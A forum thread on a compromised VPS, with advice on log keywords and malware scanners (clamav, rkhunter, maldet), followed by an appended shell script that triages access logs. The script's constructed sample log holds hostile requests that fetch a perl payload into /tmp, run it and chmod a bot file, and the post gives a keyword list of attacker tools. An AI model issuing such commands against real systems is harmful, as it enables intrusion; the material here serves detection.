LinuxQuestions.org > Forums > Linux Forums > Linux - Security
Linux - Security: This forum is for all security related questions. Questions, tips, system compromises, firewalls, etc. are all included here.
09-29-2016, 02:08 PM   #16
descendant_command
Senior Member
 
Registered: Mar 2012
Posts: 1,876

Rep: Reputation: 643

Quote:
Originally Posted by rustyz82
Yeah, I see the error in how I set up the site and user now. I used the same user I log in with as the web server user.
Wow.
So everything your user has access to is potentially compromised, not 'just' the entire webroot....

Quote:
Originally Posted by rustyz82
While I appreciate your advice, and this is probably what I will end up doing, this isn't a critical site/box ... I personally have this VPS as a hobby and enjoy challenges like this. If this were a critical or at all important machine or website ... but since it's not...
It certainly IS to everybody that has to put up with the spam and malware industry YOU are providing hosting for, along with DDOS and other attack vectors that could be spewing from YOUR "unimportant" server whenever its real owner decides.
Who do you think the authorities are going to come and "talk to" about the kiddie-porn that they find being hosted and distributed by YOUR server?
09-29-2016, 07:18 PM   #17
Habitual
LQ Veteran
 
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Blog Entries: 37

Rep: Reputation: Disabled
Quote:
Originally Posted by rustyz82
While I appreciate your advice, and this is probably what I will end up doing, this isn't a critical site/box and I see this as the perfect opportunity to learn. Your advice is overall sound but condescending in nature. I personally have this VPS as a hobby and enjoy challenges like this. If this were a critical or at all important machine or website I would say you are 100% correct in your statements about hiring a professional, but since it's not, I would rather take this as an opportunity to learn and grow as a sysadmin... and eventually, I'll know what I'm doing. How else am I going to learn?
I didn't mean to sound condescending, sorry.
I just meant to impart the finality of the situation. It is a Great Time to Learn and this is a perfect opportunity.
Sorry for my terse answer. Most folks want a fix, not a path to a solution.

Start with https://www.linuxquestions.org/quest...erences-45261/

Look for these keywords in the logs:
Code:
chmod bash curl lwp-request wget lwp-download rm /tmp /var/tmp perl passwd group
clamscan is a great indicator (it doesn't clean anything but has a nice report feature)

Apt-based OS assumed. Else 's/apt/yum/g'
install it using
Code:
sudo apt-get install -y clamav
To manually run a scan, use
Code:
clamscan -ir /path/to/scan/
-i is infected
-r is report
real example of a run:
Code:
----------- SCAN SUMMARY -----------
Known viruses: 4879143
Engine version: 0.98.7
Scanned directories: 5
Scanned files: 34
Infected files: 0
Data scanned: 4.22 MB
Data read: 2.58 MB (ratio 1.63:1)
Time: 31.835 sec (0 m 31 s)


rkhunter 1.4.3
Code:
cd /usr/src/
# the tarball is served as "index.html?view=tar", so fetch it and rename it
wget http://rkhunter.cvs.sourceforge.net/viewvc/rkhunter/rkhunter/?view=tar
mv index.html\?view\=tar rkhunter.tar.gz
tar zxf rkhunter.tar.gz
mv rkhunter rkhunter-1-4-3
cd rkhunter-1-4-3
./installer.sh --install
# pull the current signature/data files before the first scan
rkhunter --update
Before you scan however, to eliminate false positives on the first run, see the
'What to do with "common" warnings' blurb at https://help.ubuntu.com/community/RKhunter

LinuxMalwareDetect
Code:
cd /usr/src/
wget http://www.rfxn.com/downloads/maldetect-current.tar.gz
# untar it, cd into the extracted directory, and run the installer
tar xzf maldetect-current.tar.gz
cd maldetect-*/
sudo ./install.sh

Finally, update and run
Code:
maldet -du && maldet -a /var/www/
Good Luck and Good Learning!

Last edited by Habitual; 09-29-2016 at 07:19 PM.
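As an added example (not from Habitual's post and not part of any of the tools above), here is a POSIX shell triage script that searches an access log for the keyword list from the post and ranks the client IPs and keywords behind the hits. The log lines are constructed for the demo and the real log path (/var/log/apache2/access.log) is an assumption.

```shell
#!/bin/sh
# Added example, not from the forum post: triage a web server access log for the
# indicator keywords listed above, then rank the client IPs behind the hits.
# The log lines below are constructed; on a real box point the functions at
# your access log, e.g. /var/log/apache2/access.log (path assumed).

KEYWORDS="chmod bash curl lwp-request wget lwp-download rm /tmp /var/tmp perl passwd group"

SAMPLE_LOG=$(mktemp)          # constructed sample in Apache combined log format
cat > "$SAMPLE_LOG" <<'EOF'
203.0.113.5 - - [29/Sep/2016:14:01:02 -0500] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [29/Sep/2016:14:02:10 -0500] "GET /img.php?c=wget%20http://example.invalid/x.pl%20-O%20/tmp/x.pl HTTP/1.1" 200 77 "-" "curl/7.47.0"
198.51.100.7 - - [29/Sep/2016:14:02:11 -0500] "GET /img.php?c=perl%20/tmp/x.pl HTTP/1.1" 200 12 "-" "curl/7.47.0"
203.0.113.5 - - [29/Sep/2016:14:03:30 -0500] "GET /about.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.9 - - [29/Sep/2016:14:05:00 -0500] "POST /upload.php HTTP/1.1" 200 33 "-" "Mozilla/5.0"
192.0.2.9 - - [29/Sep/2016:14:05:01 -0500] "GET /uploads/c.php?x=chmod%20755%20/var/tmp/bot HTTP/1.1" 200 5 "-" "Mozilla/5.0"
EOF

# Undo the %20 / + encoding used in query strings so "wget%20..." still matches.
decode() { sed 's/%20/ /g; s/+/ /g' "$1"; }

# Every line containing a keyword as a whole word (-w keeps "form" from matching "rm").
scan_log() {
  pattern=$(printf '%s' "$KEYWORDS" | tr ' ' '|')
  decode "$1" | grep -Eiw -- "$pattern" || true
}

# Number of flagged lines in log file $1.
flagged_lines() { scan_log "$1" | wc -l | tr -d ' '; }

# Client IPs ranked by flagged requests: "count ip", busiest first.
flagged_ips() {
  scan_log "$1" | awk '{print $1}' | sort | uniq -c | sort -rn | awk '{print $1, $2}'
}

# Which keywords fired and on how many lines: "count keyword", most frequent first.
flagged_keywords() {
  for k in $KEYWORDS; do
    n=$(decode "$1" | grep -Eiwc -- "$k" || true)
    if [ "$n" -gt 0 ]; then printf '%s %s\n' "$n" "$k"; fi
  done | sort -rn
}

echo "flagged lines: $(flagged_lines "$SAMPLE_LOG")"
echo "--- by client IP ---"; flagged_ips "$SAMPLE_LOG"
echo "--- by keyword ---";   flagged_keywords "$SAMPLE_LOG"
```

The IPs that top the ranking are the ones whose full request history is worth reading next, and the per-keyword counts show which tools the intruder leaned on.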
Tags
apache, sendmail, spam